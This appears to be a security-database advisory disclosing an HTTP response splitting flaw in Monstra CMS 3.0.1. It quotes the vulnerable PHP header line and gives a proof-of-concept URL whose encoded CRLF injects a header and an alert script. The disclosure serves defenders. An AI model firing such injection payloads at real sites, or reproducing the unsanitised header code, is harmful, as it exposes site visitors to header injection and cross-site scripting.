Monstra 3.0.1 HTTP Response Splitting

2014.11.11
Credit: Paulos Yibelo
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Monstra <= 3.0.1 HTTP Response Splitting /plugins/captcha/crypt/cryptographp.php SetCookie("cryptcookietest", "1"); Header("Location: cryptographp.inc.php?cfg=".$_GET['cfg']."&sn=".session_name()."&".SID); so providing http://localhost/mons/plugins/captcha/crypt/cryptographp.php?cfg=%0A%0DContent-T ype:%20text/html%0A%0D%0A%0D%3Cscript%3Ealert%281%29%3C/script%3E& Would result a CRLF injection. Note: PHP version must allow multiple headers. this is fixed >5.1.2


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top